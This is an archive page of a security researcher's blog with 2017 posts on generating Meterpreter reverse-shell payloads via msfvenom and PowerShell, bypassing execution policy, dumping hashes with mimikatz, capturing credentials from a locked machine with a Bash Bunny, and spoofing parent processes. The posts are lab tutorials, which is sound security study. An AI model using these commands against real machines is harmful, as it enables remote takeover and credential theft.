Didier Stevens

Wednesday 16 August 2017

Generating PowerShell Scripts With MSFVenom On Windows

Filed under: Hacking — Didier Stevens @ 20:46

To generate a PowerShell script with msfvenom on Windows, use the command “msfvenom.bat –payload windows/x64/meterpreter_reverse_http –format psh –out meterpreter-64.ps1 LHOST=”:

The payload windows/x64/meterpreter_reverse_http is the Meterpreter payload for 64-bit Windows. Format psh is the format to use to generate a PowerShell script that will execute the payload (formats ps1 and powershell are transform formats, they do not generate a script that executes the payload).

A 32-bit payload is generated with this command “msfvenom.bat –payload windows/meterpreter_reverse_http –format psh –out meterpreter-32.ps1 LHOST=”:

Just as I showed in my post for .exe payloads, we start a handler like this:

Now we need to execute the PowerShell scripts. Just executing “powershell.exe -File meterpreter-64.ps1” will not work:

By default, .ps1 files are not executed. We can execute them by bypassing the policy “powershell.exe -ExecutionPolicy Bypass -File meterpreter-64.ps1”:

In this example, 948 is the handle to the thread created by CreateThread when the payload is executed.

But back in the Metasploit console, you will not see a connection. That’s because the PowerShell process terminates before the Meterpreter payload can fully execute: powershell.exe executes the script, which loads the Meterpreter payload in the powershell process, and then powershell.exe exits, e.g. the powershell process is terminated and thus the Meterpreter payload too.

To give the Meterpreter payload the time to establish a connection, the powershell process must remain alive. We can do this by preventing powershell.exe to exit with option -NoExit:

Now we get a connection:

This example was for a 64-bit payload on a 64-bit Windows machine.

The same command is used to execute the 32-bit payload on a 32-bit Windows machine (except for the filename, which is meterpreter-32.ps1 in our example).

To execute the 32-bit payload on a 64-bit Windows machine, we need to start 32-bit PowerShell, like this “c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -NoExit -File meterpreter-32.ps1”:

This gives us 2 sessions:

Monday 14 August 2017

Using Metasploit On Windows

Filed under: Hacking — Didier Stevens @ 10:17

In my previous post “Reading Memory Of 64-bit Processes” I used the Windows version of Metasploit so that I could do all tests with a single machine: running the Meterpreter client and server on the same machine.

The Metasploit framework requires administrative rights to install on Windows, it will install by default in the c:\metasploit folder. Your AV on your Windows machine will generate alerts when you install and use Metasploit on Windows, so make sure to create the proper exceptions.

General remark: Metaploit on Windows is slower than on Linux, be patient.

I use MSFVenom (c:\metasploit\msfvenom.bat) to create 32-bit and 64-bit executables to inject the Meterpreter payload.

Command “msfvenom.bat –help” will show you all options:

Command “msfvenom.bat –list payloads” will show you all payloads:

Command “msfvenom.bat –help-formats” will show you all output formats:

Executable formats will generate programs and scripts, while transform formats will just produce the payload. More on this later.

I use msfvenom.bat to create a 32-bit and 64-bit executable with the meterpreter_reverse_http payload.

Here is the command for 32-bit: “msfvenom.bat –payload windows/meterpreter_reverse_http –format exe –out meterpreter-32.exe LHOST=”.

Since I did not specify the platform and architecture, msfvenom will choose these based on the payload I selected.

Format exe is the executable format for .exe files.

windows/meterpreter_reverse_http is the Windows 32-bit version of the meterpreter_reverse_http payload. This payload takes several options, which can be enumerated with the following command:

“msfvenom.bat –payload windows/meterpreter_reverse_http –payload-options”

LHOST is the only required option that has no default value. I use LHOST= because I’m doing everything on the same machine, so the loopback address can be used.

Here is the command for 64-bit: “msfvenom.bat –payload windows/x64/meterpreter_reverse_http –format exe –out meterpreter-64.exe LHOST=”.

Now that I created my 2 executables, I can start Metasploit’s console and use them.

I start c:\metasploit\console.bat (this will take a couple of minutes on Windows).

And then I start the Meterpreter server with these commands:

use exploit/multi/handler
set payload windows/meterpreter_reverse_http
set lhost

The Metasploit handler is now waiting for connections. I start meterpreter-64.exe as administrator, because I want it to have SYSTEM access (I ran msfvenom and console as normal user).

When started, meterpreter-64.exe will connect to the handler and wait for instructions (the process will not exit). We can see this connection here:

With the sessions command, we can see all callbacks:

And here we select session 1 to interact with Meterpreter:

From here on, we can use this Meterpreter shell:




Sunday 13 August 2017

Reading Memory Of 64-bit Processes

Filed under: Hacking — Didier Stevens @ 23:21

When you read the memory of a 64-bit process, you have to make sure to read it from a 64-bit process. A 32-bit process can not use the documented Windows API to read the memory of a 64-bit process.

Here is an example using Metasploit with Meterpreter’s mimikatz module:

When using 32-bit meterpreter/mimikatz command msv to extract hashes from 64-bit Windows, we get an error: “0x0000012b Only part of a ReadProcessMemory or WriteProcessMemory request was completed”. This error occurs when a 32-bit process wants to read or write memory from a 64-bit process.

If we take a second look at the result of command “load mimikatz”, we see a warning: [!] Loaded x86 Mimikatz on a x64 architecture.

We need to run Meterpreter in a 64-bit process to access memory of a 64-bit process (like LSA):

Here we have no Windows API error anymore, but still no hashes. This is because Meterpreter’s mimikatz module is an older version (1.0) that can not extract hashes from the latest versions of Windows. Here we are using a 64-bit fully patched Windows 7 machine.

Command “mimikatz_command -f version” confirms module mimikatz’s version:

When we use this version on an 64-bit unpatched Windows 7 SP1 machine, we get hashes:

Maybe you recognize the LM and NTLM hashes of the empty string (AAD3B435B51404EEAAD3B435B51404EE and 31D6CFE0D16AE931B73C59D7E0C089C0).

Saturday 15 July 2017

Mimikatz Videos

Filed under: Hacking — Didier Stevens @ 21:01

I created more mimikatz videos.

And if you didn’t see it, @gentilkiwi created a BSOD command for minesweeper ;-).

mimikatz and protected processes:

mimkatz RPC mode:

And mimikatz skeleton command:

Monday 10 July 2017

Select Parent Process from VBA

Filed under: Forensics,Hacking,maldoc,Malware,My Software — Didier Stevens @ 0:00

Years ago I wrote a C program to create a new process with a chosen parent process: selectmyparent. And recently I showed what process monitor and system monitor report when you use this tool.

Starting a new process with a chosen parent process can be done from VBA too, as shown in this video (I’m not sharing the VBA code):

Sunday 9 July 2017

Video: mimikatz & minesweeper

Filed under: Entertainment,Hacking — Didier Stevens @ 16:07

@gentilkiwi‘s mimikatz has a minesweeper module with command infos. This command will show you where the mines are in minesweeper.

Saturday 8 July 2017

Video: mimikatz & !bsod

Filed under: Entertainment,Hacking — Didier Stevens @ 21:53

After the mimikatz !bsod blogpost, here’s the video:

Friday 7 July 2017

Quickpost: mimikatz !bsod

Filed under: Entertainment,Hacking,Quickpost — Didier Stevens @ 20:31

I’m going through the mimikatz source code and I’m finding all kind of gems :-).

Here is one of them, but be careful, do this only on a machine were you won’t mind losing data, because this will crash the machine.

There’s a mimikatz driver command to initiate a Blue Screen of Death: !bsod

Here I’m using mimikatz as administrator on a Windows 7 machine (because I’m not a fan of the new BSOD introduced with Windows 8):


Quickpost info

Thursday 6 April 2017

Quickpost: Using My Bash Bunny To “Snag Creds From A Locked Machine”

Filed under: Bash Bunny,Entertainment,Hacking,Hardware,Quickpost — Didier Stevens @ 23:22

FYI: This is nothing new, I’m just documenting how I configured and used my new Bash Bunny for “SNAGGING CREDS FROM LOCKED MACHINES” as Mubix explained.

After setting up my Bash Bunny, I used it on a locked Windows 10 machine to get netNTLMv2 hashes, here is the video:


After collecting the hashes, I can recover them from the Bash Bunny:

I put my Bash Bunny into arming mode: put the switch in position 3 (switch position closest to the USB connector). I insert my Bash Bunny in my Windows machine. The removable storage on the Bash Bunny gets assigned drive letter D: on my machine.

Inside folder D:\loot\quickcreds there are folders created each time I use this payload on a machine. Here is the content for the Windows 10 machine I collected hashes from (DESKTOP-DEMO):

File Proxy-Auth-NTLMv2- contains the hashes:

These can be cracked, for example with John The Ripper:

Here is what I did to setup my Bash Bunny after unboxing it:

First I updated the payloads on my Bash Bunny from the GitHub repository.

I put my Bash Bunny into arming mode: put the switch in position 3 (switch position closest to the USB connector). I insert my Bash Bunny in my Windows machine. The removable storage on the Bash Bunny gets assigned drive letter D: on my machine.

I copy the content of the GitHub repository payloads folder to the payloads folder on the Bash Bunny: d:\payloads\ (overwriting existing files).

To install the tools: I copy D:\payloads\library\tools_installer\ to D:\payloads\switch1\ (overwriting existing files).

I eject the Bash Bunny, put the switch in position 1 (payload 1, switch position closest to the LED). I insert the Bash Bunny in my Windows machine, and wait for a white solid LED: this takes about 10 seconds.

I eject the Bash Bunny, put the switch in position 3 and re-insert it into my Windows machine.

Then I set the QuickCreds payload (responder) as payload 2 on my Bash Bunny: copy D:\payloads\library\QuickCreds\ to D:\payloads\switch2\ (overwriting existing files).

I eject the Bash Bunny, put the switch in position 2 (payload 2, switch position in the middle) and insert it into my test Windows machine. After some time, the Bash Bunny displays a green LED, indicating that hashes were collected.

Quickpost info

Monday 20 March 2017

That Is Not My Child Process!

Filed under: Forensics,Hacking — Didier Stevens @ 0:00

Years ago I released a tool to create a Windows process with selected parent process: SelectMyParent.

You can not blindly trust parent-child process relations in Windows: the parent of a process can be different from the process that created that process.

Here I start selectmyparent from cmd.exe to launch notepad.exe with parent explorer.exe (PID 328):

Process Explorer reports explorer.exe as the parent (and not selectmyparent.exe):

Process Monitor also reports explorer.exe as the parent:

If we look in the call stack of the process creation of notepad.exe, we see 2 frames (6 and 7) with unknown modules:

We should see entries in the call stack for explorer.exe if notepad.exe was started by explorer.exe, but we don’t.

The <unknown> module is actually selectmyparent.exe.

0x11b1461 is the address of the instruction after the call to _main in ___tmainCRTStarup in selectmyparent.exe.

0x11b12a8 is the address of the instruction after the call to CreateProcessW in _main in selectmyparent.exe.


System Monitor also reports explorer.exe as the parent:

Finally, Volatility’s pstree command also reports explorer.exe as the parent:

« Previous PageNext Page »

Blog at WordPress.com.